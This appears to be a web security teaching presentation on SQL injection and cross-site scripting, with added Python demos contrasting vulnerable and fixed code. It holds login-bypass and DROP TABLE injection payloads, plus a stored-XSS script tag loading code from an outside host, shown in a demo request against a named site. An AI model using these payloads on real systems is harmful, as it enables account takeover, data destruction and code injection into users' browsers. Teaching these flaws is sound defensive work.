Web security 2010


Published on February 16, 2014

Author: alokbabu1

Source: slideshare.net


One of my short presentations on web security. (Demo)
- Sql injection
- Cross site scripting.

Software Security

What is software security? • Application security encompasses measures taken throughout the application's life-cycle to prevent violations of the security policy of the application or the underlying system (vulnerabilities) caused by flaws in the design, development, deployment, upgrade, or maintenance of the application.

Why is software security important?
• Leakage of sensitive data.
• Crash of the entire application or database.
• Fixing issues after an attack is more expensive and time consuming than fixing them during development.
• Quality of the product.

Common vulnerabilities in web applications
• SQL injection
• Cross-site scripting (XSS)
• Buffer overflows
• HTTP response splitting

2010 statistics of web Vulnerability

What is SQL injection? • SQL injection is a code injection technique that exploits a vulnerability in how an application builds the statements it sends to its database. The vulnerability is present when user input is concatenated into a SQL statement without being correctly escaped for string-literal delimiters, or is not strongly typed, so that attacker-supplied text is parsed and executed as part of the query.

How does it work?


Login using SQL injection
• The query is built by string concatenation:

    "SELECT * FROM users WHERE name = '" + userName + "' AND password = '" + password + "';"

• Payloads typed into the name/password fields:

    a' OR 't'='t
    1' OR 1=1

  (The second form only parses when the rest of the statement is commented out with --, or when the column is compared as a number; the first form closes the quote and reopens it, so it fits the query above directly.)

• Resulting queries:

    SELECT * FROM users WHERE name = '' AND password = '';                            (empty form)
    SELECT * FROM users WHERE name = 'admin' AND password = 'pass123';               (legitimate login)
    SELECT * FROM users WHERE name = 'a' OR 't'='t' AND password = 'a' OR 't'='t';   (always true: matches every row, so the application logs the attacker in)
    SELECT * FROM users WHERE name = 'a' OR 't'='t' AND password = 'a' OR 't'='t'; DROP TABLE users; --';   (stacked statement drops the table, if the driver allows more than one statement per call)
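The login bypass above, run end to end against an in-memory SQLite database, with the same check rewritten with bound parameters beside it. This is an added example, not code from the presentation; the user rows, the admin' -- comment payload and the function names are constructed for the demo.

```python
import sqlite3

# Constructed sample rows for the demo (not from the presentation).
USERS = [("admin", "pass123"), ("alice", "s3cret")]


def make_db():
    """In-memory SQLite database with a users table and the two constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", USERS)
    conn.commit()
    return conn


def login_vulnerable(conn, user_name, password):
    """Builds the statement by string concatenation, exactly as the slide does.
    Returns the sorted names of matching rows; a non-empty list means 'logged in'."""
    query = ("SELECT name FROM users WHERE name = '" + user_name
             + "' AND password = '" + password + "'")
    return sorted(row[0] for row in conn.execute(query))


def login_safe(conn, user_name, password):
    """Same check with bound parameters: the driver passes the input as data,
    so quotes, OR clauses and comment markers inside it never reach the SQL parser
    as syntax."""
    rows = conn.execute(
        "SELECT name FROM users WHERE name = ? AND password = ?",
        (user_name, password),
    )
    return sorted(row[0] for row in rows)


def demo():
    """Runs the legitimate login, the slide's a' OR 't'='t payload, and a
    comment-based payload against both implementations."""
    conn = make_db()
    tautology = "a' OR 't'='t"
    # Closes the quote after 'admin' and comments out the password check.
    comment = "admin' --"
    return {
        "vuln_legit": login_vulnerable(conn, "admin", "pass123"),
        "vuln_tautology": login_vulnerable(conn, tautology, tautology),
        "vuln_comment": login_vulnerable(conn, comment, "wrong"),
        "safe_legit": login_safe(conn, "admin", "pass123"),
        "safe_tautology": login_safe(conn, tautology, tautology),
        "safe_comment": login_safe(conn, comment, "wrong"),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(name, result)
```

With the tautology in both fields the concatenated statement matches every row (AND binds tighter than OR, so the WHERE clause reduces to name = 'a' OR ... OR 't'='t'); with admin' -- it matches exactly the admin row without the password ever being compared. The parameterised version returns nothing for either payload because the whole string is compared as a literal name. Python's sqlite3 refuses more than one statement per execute() call, so the slide's DROP TABLE variant is not reproduced here; that protection is driver-specific and not something to rely on.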


XSS( Cross-Site Scripting)

Cross-site scripting • Cross-site scripting (XSS) is a type of security vulnerability typically found in web applications that enables an attacker to inject client-side script into web pages viewed by other users.

How it works: script injection (stored XSS)
• Same as before, but instead of placing the code in a URL, the script is submitted through the application's own non-validated forms and saved in its database.
• When that data is retrieved from the database and a user loads the page, the script executes and the attack occurs.
• The user would never know the code was executed without viewing the source of each page, since the link looks valid.
• The application's owner is potentially liable, since the attack code is stored on their site.

Payload:

    <SCRIPT SRC="http://ha.ckers.org/xss.js"></SCRIPT>

Demo request (the firstname parameter carries the payload; the profile page stores it and renders it back):

    http://www.easydoc.com.au/test/personalprofile.action?address1=&suburb=&state=&zipcode=1&homePhone=&mobilenumber=&reminderOption=0&title=Dr&firstname=<SCRIPT SRC="http://ha.ckers.org/xss.js"></SCRIPT>&lastname=Doctor&photoupload=&smsOption=0&type=GP&reqNo=82

Preventing SQL injection and XSS
• SCRUB error handling: error messages divulge information that an attacker can use.
• VALIDATE all user-entered parameters.
• CHECK data types and lengths.
• DISALLOW unwanted data (e.g. HTML tags, JavaScript).
• ESCAPE questionable characters (ticks, --, semicolons, brackets, etc.).
Escaping alone is fragile: use parameterised queries (bound variables) for SQL and context-aware output encoding for HTML, and treat input validation as defence in depth rather than the only control.
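The stored XSS from the profile demo and the prevention checklist, worked through in one place: a constructed submission modelled on the demo request's parameters is run through an allow-list validator (CHECK types and lengths, DISALLOW tags), stored, and then rendered both raw and with output escaping. This is an added example, not code from the presentation or from the site in the demo; the field rules, the 4-digit postcode format and the function names are assumptions made for the illustration.

```python
import html
import re

# Constructed profile submission modelled on the slide's URL parameters
# (not captured from the real site); firstname carries the script tag.
SUBMISSION = {
    "title": "Dr",
    "firstname": '<SCRIPT SRC="http://ha.ckers.org/xss.js"></SCRIPT>',
    "lastname": "Doctor",
    "zipcode": "1",
    "type": "GP",
}

# Allow-list rules: assumed for the demo, not the site's real validation.
ALLOWED_TITLES = {"Dr", "Mr", "Mrs", "Ms"}
NAME_RE = re.compile(r"^[A-Za-z' -]{1,40}$")   # letters, apostrophe, hyphen, space; bounded length
ZIP_RE = re.compile(r"^\d{4}$")                 # assumption: 4-digit postcode
ALLOWED_TYPES = {"GP", "Specialist"}


def validate(profile):
    """Return the names of fields that fail the type/length/allow-list checks.
    An empty list means the submission may be stored."""
    errors = []
    if profile.get("title") not in ALLOWED_TITLES:
        errors.append("title")
    for field in ("firstname", "lastname"):
        if not NAME_RE.match(profile.get(field, "")):
            errors.append(field)
    if not ZIP_RE.match(profile.get("zipcode", "")):
        errors.append("zipcode")
    if profile.get("type") not in ALLOWED_TYPES:
        errors.append("type")
    return errors


def render_vulnerable(profile):
    """Interpolates stored fields straight into the HTML body: whatever was
    saved in the database is emitted as markup, so the script tag executes."""
    return "<h1>%s %s %s</h1>" % (
        profile["title"], profile["firstname"], profile["lastname"])


def render_safe(profile):
    """Same page with HTML-body escaping on output: the stored value is shown
    as text. html.escape(quote=True) also covers the attribute context."""
    escaped = tuple(html.escape(profile[k], quote=True)
                    for k in ("title", "firstname", "lastname"))
    return "<h1>%s %s %s</h1>" % escaped


def demo():
    """Stores the submission as the vulnerable application would (no validation),
    then shows what the validator would have rejected and how each renderer
    displays the stored record."""
    database = []                    # stand-in for the profile table
    database.append(dict(SUBMISSION))  # stored verbatim, script tag included
    stored = database[-1]
    return {
        "errors": validate(stored),
        "vulnerable": render_vulnerable(stored),
        "safe": render_safe(stored),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(name, result)
```

The validator rejects the submission on firstname (the tag contains characters outside the allow-list) and on zipcode (wrong length), which is the CHECK/DISALLOW step; the escaped renderer neutralises the payload even if validation is skipped or bypassed, which is why output encoding is the primary XSS control. Note that html.escape is correct for the HTML body and quoted attributes only; a value placed inside a script block, a URL or a CSS rule needs the encoding for that context.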

Thank You
